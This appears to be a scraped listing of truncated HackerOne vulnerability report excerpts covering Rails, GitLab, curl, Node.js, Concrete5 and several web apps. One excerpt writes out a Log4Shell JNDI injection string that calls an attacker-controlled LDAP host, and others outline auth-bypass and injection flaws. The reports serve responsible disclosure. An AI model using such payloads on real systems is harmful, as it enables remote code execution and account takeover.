HackerOne Reports
Since `ActiveSupport::MessageVerifier` and `ActiveSupport::MessageEncryptor` use Marshal as the default serializer, I confirmed that RCE is possible by object injection.

```ruby
# https://github.com/rails/rails/blob/v5.2.2/activesupport/lib/active_support/message_verifier.rb#L110
def initialize(secret, options = {})
  raise ArgumentError, "Secret should not be nil." unless secret
  @secret = secret
  @digest = options[:digest] || "SHA1"
  @serializer = options[:serializer] || Marshal
end
```
…
## Summary GitLab-Runner, when running on Windows with a `docker` executor, is vulnerable to Command Injection via the `DOCKER_AUTH_CONFIG` build variable. Injected commands are executed on the container host, not within a Docker container, and as such could compromise all future builds which are executed by the runner. ## Details When …
Path Traversal on Default Installed Rails Application (Asset Pipeline)
Medium
$1,500
Closed
Description Summary: During the analysis of the curl source code, a possible vector for Cross-Site Scripting (XSS) was identified through the glob_url() function and how URL input is handled via urlnode->url. Improper input validation or escaping could result in untrusted data being processed insecurely. Affected version: Latest GitHub clone of …
Hi, This report is about an Arbitrary Directory Listing vulnerability I found in the serve module. The vulnerability does not allow opening an arbitrary file, due to the `send` module which handles file reading and implements its own validation and protection against Path Traversal attacks. However, `serve` handles directory listing on its own and …
The fix for CVE-2022-32212, covered the cases for routable IP addresses, however, there exists a specific behavior on macOS devices when handling the `http://0.0.0.0` URL that allows an attacker-controlled DNS server to bypass the DNS rebinding protection by resolving hosts in the `.local` domain. [Original HackerOne report](https://hackerone.com/reports/1632921) [Node.js Blog](https://nodejs.org/en/blog/vulnerability/september-2022-security-releases/#dns-rebinding-in-inspect-insufficient-fix-of-cve-2022-32212-affecting-macos-devices-high-cve-2022-32212-cve-2018-7160) ## …
A little bit about Rate Limit: A rate limiting algorithm is used to check if the user session (or IP address) has to be limited based on the information in the session cache. In case a client made too many requests within a given timeframe, HTTP servers can respond with status code …
### Summary When importing a project via the BulkImports, the response field `httpUrlToRepo` from the client is used to fetch the repo: https://gitlab.com/gitlab-org/gitlab/-/blob/v15.3.1-ee/lib/bulk_imports/projects/pipelines/repository_pipeline.rb#L17

```ruby
def load(context, data)
  url = data['httpUrlToRepo']
  return unless url.present?

  url = url.sub("://", "://oauth2:#{context.configuration.access_token}@")

  project = context.portable
  Gitlab::UrlBlocker.validate!(url, allow_local_network: allow_local_requests?, allow_localhost: allow_local_requests?)

  project.ensure_repository
  project.repository.fetch_as_mirror(url)
end
```
`Gitlab::UrlBlocker.validate` …
I found a debug page with no access control that allows: - Uploading files. - Reading files if they are in JSON format. - Deleting files. ## Impact - Insufficient access control. - An attacker can delete files exposed by the application. ## System Host(s) ████ ## Affected Product(s) and …
## Summary: (salam) Hi team, I hope you are well. After doing some recon on ███████ I saw that the website uses Jolokia 1.3.5, which is vulnerable to reflected XSS. ## Steps To Reproduce: 1. Vuln Link : ████: CVE-2018-1000129 Jolokia - Version ████████ ## POC █████████ ## Impact If an …
## Summary: Hello Team, https://mtnmobad.mtnbusiness.com.ng/app/updateUser allows authenticated users to alter their account profile. However, there is no authorization check when updating another user's profile, allowing an attacker to modify anyone's profile info such as `Username, Address, Mobile Number, Company Name and Company Size`. ## Steps To Reproduce: ## Requirements: …
## Summary: The `wp-json` implementation on some WordPress websites I've tested is vulnerable to Denial-of-service, whereby an attacker can provide an arbitrary origin header in the request, which is then echoed back in the response via the `Access-Control-Allow-Origin` header, which is cached and served to other requests. This response …
The '/scauth/otp/droid/logout' request contains a user_id parameter. Usually it is equal to the current user's user_id, but if an attacker passes the user_id of the victim's account, he can log in as the victim. I will demonstrate the problem on two accounts. Victim: ███ Attacker: ██████████ - The attacker performs a usual login to the attacker's personal account. - …
crayons :) ### Concrete5 Arbitrary File delete via PHAR deserialization - Target: Concrete5 - Version: 8.5.4 (Latest at 2020. 07. 12) / PHP 7.2 - Credit: [WSP Lab](https://wsp-lab.github.io/)@KAIST - Contact: [email protected] #### TL; DR - An attacker can send an arbitrary input value in the is_dir() function, which causes a …
**Description:** https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 ## Impact Probably arbitrary code execution ## System Host(s) ████████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-44228 ## Steps to Reproduce 1. Browse to https://████████/███████https%3A%2F%2F█████████%2F 2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field 3. Enter a random password 4. Submit Observe that a request was made …
The Social App (https://apps.nextcloud.com/apps/social) lacks access controls in the `displayPost` function (`/@{username}/{token}`) allowing an unauthenticated user to view any message content by knowing or guessing the message ID. The vulnerable code is at https://github.com/nextcloud/social/blob/97fb063479d4c0ad6fccdea3774601a619f8a886/lib/Controller/ActivityPubController.php#L367. Note the TODO comment and the lack of authentication and authorization checks. The following is a …